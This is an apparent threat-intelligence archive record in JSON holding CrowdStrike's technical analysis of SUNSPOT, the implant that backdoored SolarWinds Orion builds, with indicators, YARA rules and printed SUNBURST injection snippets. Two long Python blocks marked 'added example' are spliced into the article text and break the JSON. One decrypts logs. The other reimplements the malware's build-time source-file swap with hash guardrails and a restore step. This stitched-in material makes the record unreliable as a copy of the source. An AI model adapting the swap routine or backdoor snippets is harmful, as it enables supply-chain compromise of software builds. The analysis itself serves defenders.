{
	"id": "a6c65ed0-3992-481d-b71c-3a498d7366b7",
	"created_at": "2026-04-06T00:15:37.027291Z",
	"updated_at": "2026-04-10T03:37:33.151133Z",
	"deleted_at": null,
	"sha1_hash": "8396ad0567d9f0acede51cfcf3e432727d4da43b",
	"title": "SUNSPOT Malware: A Technical Analysis | CrowdStrike",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 139892,
	"plain_text": "SUNSPOT Malware: A Technical Analysis | CrowdStrike\r\nBy CrowdStrike Intelligence Team\r\nArchived: 2026-04-05 15:37:54 UTC\r\nIn December 2020, the industry was rocked by the disclosure of a complex supply chain attack against SolarWinds, Inc., a\r\nleading provider of network performance monitoring tools used by organizations of all sizes across the globe. CrowdStrike\r\nand another firm have been supporting SolarWinds in its investigation and root cause analysis of the events that led to the\r\ninclusion of unauthorized malicious code into its build cycle. In coordination with SolarWinds, which has posted a blog\r\ndetailing its efforts to ensure the security of its customers and build processes, CrowdStrike is providing a technical analysis\r\nof a malicious tool that was deployed into the build environment to inject this backdoor into the SolarWinds Orion platform\r\nwithout arousing the suspicion of the development team charged with delivering the product. At this time, CrowdStrike does\r\nnot attribute the SUNSPOT implant, SUNBURST backdoor or TEARDROP post-exploitation tool to any known adversary;\r\nas such, CrowdStrike Intelligence is tracking this intrusion under the StellarParticle activity cluster.\r\nKey Points\r\nSUNSPOT is StellarParticle’s malware used to insert the SUNBURST backdoor into software builds of the\r\nSolarWinds Orion IT management product.\r\nSUNSPOT monitors running processes for those involved in compilation of the Orion product and replaces one of\r\nthe source files to include the SUNBURST backdoor code.\r\nSeveral safeguards were added to SUNSPOT to avoid the Orion builds from failing, potentially alerting developers to\r\nthe adversary’s presence. \r\nAnalysis of a SolarWinds software build server provided insights into how the process was hijacked by StellarParticle in\r\norder to insert SUNBURST into the update packages. 
The design of SUNSPOT suggests StellarParticle developers invested\r\na lot of effort to ensure the code was properly inserted and remained undetected, and prioritized operational security to avoid\r\nrevealing their presence in the build environment to SolarWinds developers.\r\nSUNSPOT was identified on disk with a filename of taskhostsvc.exe (SHA256 Hash:\r\nc45c9bda8db1d470f1fd0dcc346dc449839eb5ce9a948c70369230af0b3ef168 ), and internally named taskhostw.exe by its\r\ndevelopers. It was likely built on 2020-02-20 11:40:02, according to the build timestamp found in the binary, which is\r\nconsistent with the currently assessed StellarParticle supply chain attack timeline. StellarParticle operators maintained the\r\npersistence of SUNSPOT by creating a scheduled task set to execute when the host boots. \r\nInitialization and Logging\r\nWhen SUNSPOT executes, it creates a mutex named {12d61a41-4b74-7610-a4d8-3028d2f56395} to ensure only one\r\ninstance is running. It then creates an encrypted log file at C:\\Windows\\Temp\\vmware-vmdmp.log . Individual log entries are\r\nencrypted with the stream cipher RC4, using the hard-coded key FC F3 2A 83 E5 F6 D0 24 A6 BF CE 88 30 C2 48 E7 .\r\nThroughout execution, SUNSPOT will log errors to this file, along with other deployment information. Log entries are\r\ndelineated by the hex string 32 78 A5 E7 1A 79 91 AC and begin with the number of seconds elapsed since the first log\r\nline. Most log lines corresponding to an error contain a step number (e.g., Step19) requiring knowledge of the malware to\r\nunderstand their meaning. These steps and their mapping to the malware actions are provided at the end of this blog. The\r\nstep numbering does not follow the actual execution order, suggesting the calls to the logging function were added by the\r\ndevelopers during the creation of the malware as they progressed and needed to focus their efforts on debugging one part of\r\nthe code. 
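As an added example (not code from the CrowdStrike post), the following Python decrypter reconstructs a log of this format from the values reported above: it splits the file on the delimiter, RC4-decrypts each entry with the hard-coded key, and translates [ERROR] step numbers using the step table at the end of the post. Two points are assumptions drawn from the description rather than facts stated on the page: that the marker sits between entries, and that every entry is encrypted with a fresh RC4 keystream. The sample entries are constructed to mirror the extract given below (chr(92) stands in for the backslash in the solution path).

```python
# Added example (not code from the CrowdStrike post): decrypt and triage a
# SUNSPOT-style log. Key and delimiter are the values reported in the post;
# the per-entry keystream layout and the sample entries are assumptions.

RC4_KEY = bytes.fromhex('fcf32a83e5f6d024a6bfce8830c248e7')   # hard-coded RC4 (and AES) key
ENTRY_DELIMITER = bytes.fromhex('3278a5e71a7991ac')             # marker between log entries

# Subset of the step table at the end of the post, keyed by step number.
STEP_MEANING = {
    1: 'original file could not be restored after tampering',
    4: 'could not get the size of the original source code file',
    6: 'MD5 of the original source file does not match the expected value',
    9: 'MD5 of the decrypted backdoored source does not match the expected value',
    20: 'could not add SeDebugPrivilege to the process token',
    30: 'could not decrypt the solution name core.sln',
}


def rc4(key: bytes, data: bytes) -> bytes:
    '''Textbook RC4 (KSA then PRGA). The same call encrypts and decrypts.'''
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def build_log_file(entries) -> bytes:
    '''Assemble an on-disk log as described: each entry encrypted on its own
    (assumed fresh keystream) with the marker between entries.'''
    return ENTRY_DELIMITER.join(rc4(RC4_KEY, e.encode()) for e in entries)


def decrypt_log(blob: bytes):
    '''Split on the marker, decrypt each chunk, return the plaintext entries.'''
    return [rc4(RC4_KEY, chunk).decode('utf-8', 'replace')
            for chunk in blob.split(ENTRY_DELIMITER) if chunk]


def parse_entry(entry: str):
    '''Return (seconds, tag, message); tag is the bracketed thread id or ERROR,
    or INFO for the bare START line.'''
    if '[' not in entry:
        secs, _, msg = entry.partition(' ')
        return float(secs), 'INFO', msg
    head, _, msg = entry.partition(']')
    secs, _, tag = head.partition('[')
    return float(secs), tag, msg.strip()


def step_number(msg: str):
    '''StepN(...) fails  ->  N, or None when the message is not a step error.'''
    if not msg.startswith('Step'):
        return None
    digits = ''
    for ch in msg[4:]:
        if not ch.isdigit():
            break
        digits += ch
    return int(digits) if digits else None


def triage(blob: bytes) -> dict:
    '''Decrypt a log and summarise it: MsBuild.exe processes picked up,
    solution directories seen, and step errors with their meaning.'''
    report = {'builds_seen': 0, 'solution_dirs': [], 'errors': []}
    for entry in decrypt_log(blob):
        secs, tag, msg = parse_entry(entry)
        if msg.startswith('+ '):                   # a new MsBuild.exe was picked up
            report['builds_seen'] += 1
        elif msg.startswith('Solution directory: '):
            report['solution_dirs'].append(msg[len('Solution directory: '):])
        elif tag == 'ERROR':
            n = step_number(msg)
            report['errors'].append((secs, n, STEP_MEANING.get(n, 'unknown step')))
    return report


# Constructed sample, modelled on the extract in the post (chr(92) is a backslash).
SOLUTION_DIR = chr(92).join(['C:', 'Users', 'User', 'Source'])
SAMPLE_ENTRIES = [
    '0.000 START',
    '''22.781[3148] + 'msbuild.exe' [6252]''',
    '181.421[3148] - 0',
    '194.343[3148] -',
    '''194.343[13760] + 'msbuild.exe' [6252]''',
    '485.343[13760] Solution directory: ' + SOLUTION_DIR,
    '''485.343[ERROR] Step6('InventoryManager.cs') fails''',
]
SAMPLE_LOG = build_log_file(SAMPLE_ENTRIES)

if __name__ == '__main__':
    for line in decrypt_log(SAMPLE_LOG):
        print(line)
    print(triage(SAMPLE_LOG))
```

To use it on a recovered vmware-vmdmp.log, pass the file bytes to triage() in place of SAMPLE_LOG. If the entries come out as garbage, the per-entry keystream assumption is the first thing to revisit: try decrypting the whole file as one RC4 stream before splitting.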
An extract of a log file generated by SUNSPOT in a test environment is given below.\r\n0.000 START\r\n22.781[3148] + 'msbuild.exe' [6252]\r\n181.421[3148] - 0\r\n194.343[3148] -\r\n194.343[13760] + 'msbuild.exe' [6252]\r\n322.812[13760] - 0\r\n324.250[13760] -\r\n324.250[14696] + 'msbuild.exe' [6252]\r\n351.125[14696] - 0\r\n352.031[14176] + 'msbuild.exe' [6252]\r\n369.203[14696] -\r\n375.093[14176] - 0\r\n376.343[14176] -\r\n376.343[11864] + 'msbuild.exe' [6252]\r\n426.500[11864] - 0\r\n439.953[11864] -\r\n439.953[9204] + 'msbuild.exe' [6252]\r\n485.343[9204] Solution directory: C:\\Users\\User\\Source\r\n485.343[ERROR] Step4('C:\\Users\\User\\Source\\Src\\Lib\\SolarWinds.Orion.Core.BusinessLayer\\BackgroundInventory\\InventoryManager.cs') fails\r\nhttps://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/\r\nPage 1 of 7\r\nSUNSPOT also grants itself debugging privileges by adding SeDebugPrivilege to its security token. This step is\r\na prerequisite for the remainder of SUNSPOT’s execution, which involves reading other processes' memory.\r\nBuild Hijacking Steps\r\nMonitoring of Running Software Build Processes\r\nAfter initialization, SUNSPOT monitors running processes for instances of MsBuild.exe, which is part of the Microsoft Visual\r\nStudio development tools. Copies of MsBuild.exe are identified by hashing the name of each running process and\r\ncomparing it to the corresponding value, 0x53D525. The hashing algorithm used for the comparison is ElfHash and is\r\nprovided in Python in Figure 1.\r\ndef elf_hash(name):\r\n    # ElfHash over the bytes of a process name, as used by SUNSPOT to spot MsBuild.exe.\r\n    # Test input: b'msbuild.exe'\r\n    # Test output: 0x53D525\r\n    h = 0\r\n    for c in name:\r\n        v = (c + (h \u003c\u003c 4)) \u0026 0xFFFFFFFF   # keep 32-bit arithmetic like the native code\r\n        msb = v \u0026 0xF0000000              # nibble that overflowed past bit 27\r\n        if msb != 0:\r\n            v ^= (msb \u003e\u003e 24)               # fold it back into bits 4-7\r\n        h = ~msb \u0026 v                      # and clear it, so h stays below 2^28\r\n    return h\r\nFigure 1. 
Process Name Hashing Logic\r\nWhen SUNSPOT finds an MsBuild.exe process, it will spawn a new thread to\r\ndetermine if the Orion software is being built and, if so, hijack the build operation to inject SUNBURST. The monitoring\r\nloop executes every second, allowing SUNSPOT to modify the target source code before it has been read by the compiler.\r\nAlthough the mutex created during initialization should already prevent multiple process monitoring loops from running,\r\nthe malware checks for the presence of a second mutex, {56331e4d-76a3-0390-a7ee-567adf5836b7}. If this mutex is\r\nfound, SUNSPOT interprets it as a signal to quit, waits for the completion of its currently running injection\r\nthreads, and exits. This mutex was likely intended to let StellarParticle operators stop the malware discreetly,\r\ninstead of using a riskier method such as killing the process. Stopping SUNSPOT in the middle of its operation could leave\r\nthe Orion source code partially tampered with and lead to Orion build errors that SolarWinds developers would\r\ninvestigate, revealing the adversary’s presence.\r\nCommand-Line Arguments Extraction from Process Memory\r\nThe malware extracts the command-line arguments for each running MsBuild.exe process from its virtual memory using a\r\nmethodology similar to one publicly documented [1]. A call to NtQueryInformationProcess allows the adversary to obtain a\r\npointer to the remote process’s Process Environment Block (PEB), which contains a pointer to a\r\n_RTL_USER_PROCESS_PARAMETERS structure. The latter is read to get the full command line passed to the MsBuild.exe\r\nprocess. The command line is then parsed to extract individual arguments, and SUNSPOT looks for the directory path of the\r\nOrion software Visual Studio solution. This value is hard-coded in the binary, in an encrypted form using AES128-CBC,\r\nwhose parameters are given below. 
The same material is used for all of the blobs encrypted with AES in the binary.\r\nkey = FC F3 2A 83 E5 F6 D0 24 A6 BF CE 88 30 C2 48 E7 (same as the RC4 key)\r\niv = 81 8C 85 49 B9 00 06 78 0B E9 63 60 26 64 B2 DA\r\nThe key and initialization vector (IV) are not unique and can be independently found in other binary samples of several\r\npopular video games. It is plausible the material was chosen on purpose in order to make static detections on the values\r\nimpractical.\r\nOrion Source Code Replacement\r\nWhen SUNSPOT finds the Orion solution file path in a running MsBuild.exe process, it replaces a source code file in the\r\nsolution directory with a malicious variant to inject SUNBURST while Orion is being built. While SUNSPOT supports\r\nreplacing multiple files, the identified copy only replaces InventoryManager.cs.\r\nThe malicious source code for SUNBURST, along with the target file paths, is stored in AES128-CBC encrypted blobs and is\r\nprotected using the same key and initialization vector. As causing build errors would very likely prompt troubleshooting\r\nactions from the Orion developers and lead to the adversary’s discovery, the SUNSPOT developers included a hash\r\nverification check, likely to ensure the injected backdoored code is compatible with a known source file, and also to avoid\r\nreplacing the file with garbage data from a failed decryption. In the exemplar SUNSPOT sample, the MD5 hash for the\r\nbackdoored source code is 5f40b59ee2a9ac94ddb6ab9e3bd776ca. If the decryption of the parameters (target file path and\r\nreplacement source code) is successful and if the MD5 checks pass, SUNSPOT proceeds with the replacement of the source\r\nfile content. The original source file is copied with a .bk extension (e.g., InventoryManager.bk) to back up the original\r\ncontent. 
The backdoored source is written to the same filename, but with a .tmp extension (e.g., InventoryManager.tmp),\r\nbefore being moved using MoveFileEx to the original filename (InventoryManager.cs). After these steps, the source file\r\nbackdoored with SUNBURST will then be compiled as part of the standard process. SUNSPOT appends an entry in the log\r\nfile with the date and time of the backdoor attempt and waits for the MsBuild.exe process to exit before restoring the\r\noriginal source code and deleting the temporary InventoryManager.bk file. If the Orion solution build is successful, it is\r\nbackdoored with SUNBURST.\r\nSUNBURST Source Code\r\nThe source code of SUNBURST was likely sanitized before being included in SUNSPOT. The use of generic variable\r\nnames, pre-obfuscated strings, and the lack of developer comments or disabled code is similar to what could be obtained\r\nafter decompiling a backdoored Orion binary, as illustrated in Figure 2, which provides a comparison between the injected\r\nsource code (top) and a decompilation output (bottom).\r\nprivate static class ProcessTracker {\r\n    private static readonly object _lock = new object();\r\n    private static bool SearchConfigurations()\r\n    {\r\n        using (ManagementObjectSearcher managementObjectSearcher = new\r\n            ManagementObjectSearcher(ZipHelper.Unzip(\"C07NSU0uUdBScCvKz1UIz8wzNooPriwuSc11KcosSy0CAA==\")))\r\n        {\r\n            foreach (ManagementObject item in managementObjectSearcher.Get())\r\n            {\r\n                ulong hash =\r\n                    GetHash(Path.GetFileName(item.Properties[ZipHelper.Unzip(\"C0gsyfBLzE0FAA==\")].Value.ToString()).ToLower());\r\n                if (Array.IndexOf(configTimeStamps, hash) != -1)\r\n                {\r\n                    return true;\r\n                }\r\n            }\r\n        }\r\n        return false;\r\n    }\r\n\r\nprivate static class ProcessTracker {\r\n    // Token: 0x0600097C RID: 2428 RVA: 0x000435A4 File Offset: 0x000417A4\r\n    private static bool SearchConfigurations()\r\n    {\r\n        using (ManagementObjectSearcher managementObjectSearcher = 
new\r\n            ManagementObjectSearcher(OrionImprovementBusinessLayer.ZipHelper.Unzip(\"C07NSU0uUdBScCvKz1UIz8wzNooPriwuSc11KcosSy0CAA==\")))\r\n        {\r\n            foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())\r\n            {\r\n                ulong hash =\r\n                    OrionImprovementBusinessLayer.GetHash(Path.GetFileName(((ManagementObject)managementBaseObject).Properties[OrionImprovementBusinessLayer.\r\n                if (Array.IndexOf\u003culong\u003e(OrionImprovementBusinessLayer.configTimeStamps, hash) != -1)\r\n                {\r\n                    return true;\r\n                }\r\n            }\r\n        }\r\n        return false;\r\n    }\r\nFigure 2. Comparison between injected source code (top) and decompiled using DnSpy (bottom)\r\nIn order to remove compilation warnings that could be generated by the adversary’s own code, which could alert the SolarWinds developers,\r\nStellarParticle made their edits within #pragma warning disable and #pragma warning restore statements, hinting at\r\nwhat parts were edited.\r\n
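Stepping back to the Orion Source Code Replacement section above: as an added example (not code from the CrowdStrike post, SolarWinds or the malware), the following Python replays that swap sequence on constructed stand-in files in a scratch directory, with the two MD5 guardrails, the .bk backup, the .tmp staging file and the post-build restore. Return values reuse the step numbers from the log table at the end of the post; which step a given failure maps to, and the stand-in file contents, are assumptions. It makes two things visible that the prose only states: the .bk sibling exists only while MsBuild.exe is running, and a locally modified InventoryManager.cs trips the Step6 guardrail and is left untouched, so the build neither fails nor gets backdoored.

```python
# Added example (not code from the CrowdStrike post): the file-swap sequence
# from the Orion Source Code Replacement section, replayed on constructed
# files in a scratch directory. Return values are the step numbers SUNSPOT
# would log for the failure hit (assumed mapping), or None on success.
import hashlib
import shutil
import tempfile
from pathlib import Path

# Constructed stand-ins for the two decrypted blobs (clean and backdoored
# InventoryManager.cs). They are not SolarWinds or SUNBURST code.
ORIGINAL_SRC = b'// constructed stand-in for the original InventoryManager.cs'
BACKDOORED_SRC = ORIGINAL_SRC + b' plus a constructed stand-in for the injected SUNBURST code'


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def hijack_source(target: Path, expected_orig_md5: str,
                  replacement: bytes, expected_repl_md5: str):
    '''Swap target for replacement the way the post describes. Returns None on
    success or the step number SUNSPOT would log for the failure it hit.'''
    if not target.is_file():
        return 4                                   # cannot get size of the original
    if md5_hex(target.read_bytes()) != expected_orig_md5:
        return 6                                   # not the known clean version
    if md5_hex(replacement) != expected_repl_md5:
        return 9                                   # decryption produced garbage
    backup = target.with_suffix('.bk')             # InventoryManager.bk
    staged = target.with_suffix('.tmp')            # InventoryManager.tmp
    try:
        shutil.copyfile(target, backup)            # keep the original for the restore
    except OSError:
        return 10
    try:
        staged.write_bytes(replacement)            # stage the backdoored source
    except OSError:
        return 11
    try:
        staged.replace(target)                     # rename over the original (MoveFileEx in the post)
    except OSError:
        return 12
    return None


def restore_source(target: Path):
    '''Once MsBuild.exe has exited: put the original back and drop the .bk.'''
    try:
        target.with_suffix('.bk').replace(target)
    except OSError:
        return 1                                   # original cannot be restored
    return None


def listing(d: Path):
    return sorted(p.name for p in d.iterdir())


def demo() -> dict:
    '''Full sequence: what is on disk before, during and after the build.'''
    with tempfile.TemporaryDirectory() as d:
        src = Path(d) / 'InventoryManager.cs'
        src.write_bytes(ORIGINAL_SRC)
        before = listing(Path(d))
        err = hijack_source(src, md5_hex(ORIGINAL_SRC), BACKDOORED_SRC, md5_hex(BACKDOORED_SRC))
        during = listing(Path(d))                  # the compiler reads the .cs now
        compiled_backdoored = src.read_bytes() == BACKDOORED_SRC
        restore_err = restore_source(src)
        return {
            'hijack_error': err, 'restore_error': restore_err,
            'before': before, 'during_build': during, 'after': listing(Path(d)),
            'compiled_backdoored': compiled_backdoored,
            'restored_clean': src.read_bytes() == ORIGINAL_SRC,
        }


def guardrail_errors() -> tuple:
    '''Both hash guardrails tripping: a locally edited original (Step6) and a
    replacement that does not hash to the expected value (Step9). No .bk or
    .tmp is created in either case.'''
    with tempfile.TemporaryDirectory() as d:
        src = Path(d) / 'InventoryManager.cs'
        src.write_bytes(ORIGINAL_SRC + b' // local edit')
        wrong_original = hijack_source(src, md5_hex(ORIGINAL_SRC), BACKDOORED_SRC, md5_hex(BACKDOORED_SRC))
        src.write_bytes(ORIGINAL_SRC)
        garbage = hijack_source(src, md5_hex(ORIGINAL_SRC), bytes(32), md5_hex(BACKDOORED_SRC))
        return wrong_original, garbage, listing(Path(d))


if __name__ == '__main__':
    print(demo())
    print(guardrail_errors())
```

demo() returns the directory listing at each phase, which is the window a file-integrity monitor on the build tree would have to catch; guardrail_errors() shows both hash checks refusing to touch the file, which is why a source tree with any local change to the targeted file would have silently escaped the implant.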
In particular, SUNBURST’s entry point was added to the legitimate Orion software RefreshInternal\r\nfunction by adding the following try/catch block:\r\ntry {\r\n    if (!OrionImprovementBusinessLayer.IsAlive) {\r\n        Thread th = new Thread(OrionImprovementBusinessLayer.Initialize)\r\n            { IsBackground = true };\r\n        th.Start();\r\n    }\r\n} catch (Exception) {\r\n}\r\nTactics, Techniques and Procedures (TTPs)\r\nThe following TTPs may be used to characterize the SUNSPOT activity described in this blog:\r\nPersistence using scheduled tasks, triggered at boot time\r\nUse of AES128-CBC to protect the targeted source code file paths and the backdoored source code in the binary\r\nUse of RC4 encryption with a hard-coded key to protect the log file entries\r\nLog entries, including those from different executions of the malware, separated by the hard-coded value 32 78 A5 E7 1A 79\r\n91 AC\r\nLog file creation in the system temp directory C:\\Windows\\Temp\\vmware-vmdmp.log masquerading as a legitimate\r\nVMware log file\r\nDetection of the targeted Visual Studio solution build by reading the virtual memory of MsBuild.exe processes,\r\nlooking for the targeted solution filename\r\nAccess to the remote process arguments made via the remote process’s PEB structure\r\nReplacement of source code files during the build process, before compilation, by replacing file content with another\r\nversion containing SUNBURST\r\nInsertion of the backdoor code within #pragma statements disabling and restoring warnings, to prevent the backdoor\r\ncode lines from appearing in build logs\r\nCheck of the MD5 hashes of the original source code and of the backdoored source code to ensure the tampering will\r\nnot cause build errors\r\nAttempt to open a non-existing mutex to detect when the malware operators want the implant to stop execution and\r\nsafely exit\r\nHost Indicators of Attack\r\nThe tables below detail files belonging to the SUNSPOT campaigns including filename, SHA256 hash, 
and build time when\r\nknown.\r\nExecutables\r\nFilename | SHA256 Hash | Build Time (UTC)\r\ntaskhostsvc.exe | c45c9bda8db1d470f1fd0dcc346dc449839eb5ce9a948c70369230af0b3ef168 | 2020-02-20 11:40:02\r\nRelated Files\r\nDescription | SHA256 Hash\r\nBackdoored Orion source code with SUNBURST | 0819db19be479122c1d48743e644070a8dc9a1c852df9a8c0dc2343e904da389\r\nFile System\r\nThe presence of one or more of the following files may indicate a SUNSPOT infection.\r\nFile Path | Description\r\nC:\\Windows\\Temp\\vmware-vmdmp.log | Encrypted log file\r\nVolatile Artifacts\r\nName | Type | Description\r\n{12d61a41-4b74-7610-a4d8-3028d2f56395} | Mutex | Ensures a single implant instance\r\n{56331e4d-76a3-0390-a7ee-567adf5836b7} | Mutex | Used to signal the malware to exit safely\r\nYARA Rules\r\nrule CrowdStrike_SUNSPOT_01 : artifact stellarparticle sunspot\r\n{\r\n    meta:\r\n        copyright = \"(c) 2021 CrowdStrike Inc.\"\r\n        description = \"Detects RC4 and AES key encryption material in SUNSPOT\"\r\n        version = \"202101081448\"\r\n        last_modified = \"2021-01-08\"\r\n        actor = \"StellarParticle\"\r\n        malware_family = \"SUNSPOT\"\r\n    strings:\r\n        $key = {fc f3 2a 83 e5 f6 d0 24 a6 bf ce 88 30 c2 48 e7}\r\n        $iv = {81 8c 85 49 b9 00 06 78 0b e9 63 60 26 64 b2 da}\r\n    condition:\r\n        all of them and filesize \u003c 32MB\r\n}\r\nrule CrowdStrike_SUNSPOT_02 : artifact stellarparticle sunspot\r\n{\r\n    meta:\r\n        copyright = \"(c) 2021 CrowdStrike Inc.\"\r\n        description = \"Detects mutex names in SUNSPOT\"\r\n        version = \"202101081448\"\r\n        last_modified = \"2021-01-08\"\r\n        actor = \"StellarParticle\"\r\n        malware_family = \"SUNSPOT\"\r\n    strings:\r\n        $mutex_01 = \"{12d61a41-4b74-7610-a4d8-3028d2f56395}\" wide ascii\r\n        $mutex_02 = \"{56331e4d-76a3-0390-a7ee-567adf5836b7}\" wide ascii\r\n    condition:\r\n        any of them and filesize \u003c 10MB\r\n}\r\nrule CrowdStrike_SUNSPOT_03 : artifact logging stellarparticle sunspot\r\n{\r\n    meta:\r\n        copyright = \"(c) 2021 CrowdStrike Inc.\"\r\n        description = \"Detects log format lines in SUNSPOT\"\r\n        version = \"202101081443\"\r\n        last_modified = \"2021-01-08\"\r\n        actor = \"StellarParticle\"\r\n        malware_family = \"SUNSPOT\"\r\n    strings:\r\n        $s01 = \"[ERROR] ***Step1('%ls','%ls') fails with error %#x***\\x0A\" ascii\r\n        $s02 = \"[ERROR] Step2 fails\\x0A\" ascii\r\n        $s03 = \"[ERROR] Step3 fails\\x0A\" ascii\r\n        $s04 = \"[ERROR] Step4('%ls') fails\\x0A\" ascii\r\n        $s05 = \"[ERROR] Step5('%ls') fails\\x0A\" ascii\r\n        $s06 = \"[ERROR] Step6('%ls') fails\\x0A\" ascii\r\n        $s07 = \"[ERROR] Step7 fails\\x0A\" ascii\r\n        $s08 = \"[ERROR] Step8 fails\\x0A\" ascii\r\n        $s09 = \"[ERROR] Step9('%ls') fails\\x0A\" ascii\r\n        $s10 = \"[ERROR] Step10('%ls','%ls') fails with error %#x\\x0A\" ascii\r\n        $s11 = \"[ERROR] Step11('%ls') fails\\x0A\" ascii\r\n        $s12 = \"[ERROR] Step12('%ls','%ls') fails with error %#x\\x0A\" ascii\r\n        $s13 = \"[ERROR] Step30 fails\\x0A\" ascii\r\n        $s14 = \"[ERROR] Step14 fails with error %#x\\x0A\" ascii\r\n        $s15 = \"[ERROR] Step15 fails\\x0A\" ascii\r\n        $s16 = \"[ERROR] Step16 fails\\x0A\" ascii\r\n        $s17 = \"[%d] Step17 fails with error %#x\\x0A\" ascii\r\n        $s18 = \"[%d] Step18 fails with error %#x\\x0A\" ascii\r\n        $s19 = \"[ERROR] Step19 fails with error %#x\\x0A\" ascii\r\n        $s20 = \"[ERROR] Step20 fails\\x0A\" ascii\r\n        $s21 = \"[ERROR] Step21(%d,%s,%d) fails\\x0A\" ascii\r\n        $s22 = \"[ERROR] Step22 fails with error %#x\\x0A\" ascii\r\n        $s23 = \"[ERROR] Step23 fails with error %#x\\x0A\" ascii\r\n        $s24 = \"[%d] Solution directory: %ls\\x0A\" ascii\r\n        $s25 = \"[%d] %04d-%02d-%02d %02d:%02d:%02d:%03d %ls\\x0A\" ascii\r\n        $s26 = \"[%d] + '%s' \" ascii\r\n    condition:\r\n        2 of them and filesize \u003c 10MB\r\n}\r\nATT\u0026CK Framework\r\nThe following table maps reported SUNSPOT TTPs to the MITRE ATT\u0026CK® framework.\r\nTactic | Technique | Observable\r\nReconnaissance | T1592.002 Gather Victim Host 
Information - Software | StellarParticle had an understanding of the Orion build chain before SUNSPOT was developed to tamper with it.\r\nResource Development | T1587.001 Develop Capabilities - Malware | SUNSPOT was weaponized to specifically target the Orion build to replace one source code file and include the SUNBURST backdoor.\r\nPersistence | T1053.005 Scheduled Task | SUNSPOT is persisted in a scheduled task set to execute after the host has booted.\r\nDefense Evasion | T1140 Deobfuscate/Decode Information | The configuration in SUNSPOT is encrypted using AES128-CBC. It contains the replacement source code, the targeted Visual Studio solution file name, and targeted source code file paths relative to the solution directory.\r\nDefense Evasion | T1027 Obfuscated Files or Information | The log file SUNSPOT writes is encrypted using RC4.\r\nDefense Evasion | T1480 Execution Guardrails | The replacement of source code is done only if the MD5 checksums of both the original source code file and the backdoored replacement source code match hardcoded values.\r\nDefense Evasion | T1036 Masquerading | SUNSPOT masquerades as a legitimate Windows binary and writes its logs to a file named like a VMware log file.\r\nDiscovery | T1057 Process Discovery | SUNSPOT monitors running processes looking for instances of MsBuild.exe.\r\nImpact | T1565.001 Data Manipulation: Stored Data Manipulation | Modification of the Orion source code to inject SUNBURST.\r\nLogged Steps and Corresponding Errors\r\nThe following table provides a mapping of the step numbers found in the log file to the actual action performed by\r\nSUNSPOT. The step numbering does not reflect the actual execution order. 
Some values are also missing.\r\nStep In Log File | Meaning\r\nSTART | Logged after the initialization has completed successfully\r\nStep1 | Original file cannot be restored after tampering with the build process\r\nStep2 | Could not decrypt one of the targeted source code file’s paths (relative to the solution directory)\r\nStep3 | Could not create the file path for the targeted source code file\r\nStep4 | Could not get the size of the original source code file\r\nStep5 | Computation of the MD5 hash of the original source file failed\r\nStep6 | The MD5 hash of the original source code file did not match the expected value\r\nStep7 | Could not successfully decrypt the backdoored source code\r\nStep8 | Computation of the MD5 hash of the backdoored source code failed\r\nStep9 | The MD5 hash of the decrypted backdoored source code did not match the expected value\r\nStep10 | Could not create a backup of the original source code file\r\nStep11 | Could not write the backdoored source code to disk (in the .tmp file)\r\nStep12 | Could not move the temporary file with the backdoored source code (.tmp extension) to the path of the original source\r\nStep14 | Could not read the MsBuild.exe process memory to resolve its command-line arguments\r\nStep15 | The returned PEB address for the remote process is zero\r\nStep16 | Calling NtQueryInformationProcess failed\r\nStep17 | Could not create a handle to the MsBuild.exe process with SYNCHRONIZE access\r\nStep18 | Could not successfully wait for the MsBuild.exe process termination\r\nStep19 | Resolving the address of the NtQueryInformationProcess function failed\r\nStep20 | Modification of the process security token to obtain SeDebugPrivilege failed\r\nStep21 | The number of currently running tampering threads exceeded 256, and SUNSPOT cannot track more threads\r\nStep22 | Unable to get a list of running 
processes\r\nStep23 | There was an error when enumerating the running processes list\r\nStep30 | Could not decrypt the solution name core.sln\r\nFootnote: 1. https[:]//blog.xpnsec[.]com/how-to-argue-like-cobalt-strike/\r\nAdditional Resources\r\nRead a blog on this topic from SolarWinds.\r\nDownload the CrowdStrike 2020 Global Threat Report.\r\nSource: https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/"
	],
	"report_names": [
		"sunspot-malware-technical-analysis"
	],
	"threat_actors": [
		{
			"id": "b43e5ea9-d8c8-4efa-b5bf-f1efb37174ba",
			"created_at": "2022-10-25T16:07:24.36191Z",
			"updated_at": "2026-04-10T02:00:04.954902Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"Dark Halo",
				"Nobelium",
				"SolarStorm",
				"StellarParticle",
				"UNC2452"
			],
			"source_name": "ETDA:UNC2452",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "1d3f9dec-b033-48a5-8b1e-f67a29429e89",
			"created_at": "2022-10-25T15:50:23.739197Z",
			"updated_at": "2026-04-10T02:00:05.275809Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"UNC2452",
				"NOBELIUM",
				"StellarParticle",
				"Dark Halo"
			],
			"source_name": "MITRE:UNC2452",
			"tools": [
				"Sibot",
				"Mimikatz",
				"Cobalt Strike",
				"AdFind",
				"GoldMax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "a241a1ca-2bc9-450b-a07b-aae747ee2710",
			"created_at": "2024-06-19T02:03:08.150052Z",
			"updated_at": "2026-04-10T02:00:03.737173Z",
			"deleted_at": null,
			"main_name": "IRON RITUAL",
			"aliases": [
				"APT29",
				"Blue Dev 5 ",
				"BlueBravo ",
				"Cloaked Ursa ",
				"CozyLarch ",
				"Dark Halo ",
				"Midnight Blizzard ",
				"NOBELIUM ",
				"StellarParticle ",
				"UNC2452 "
			],
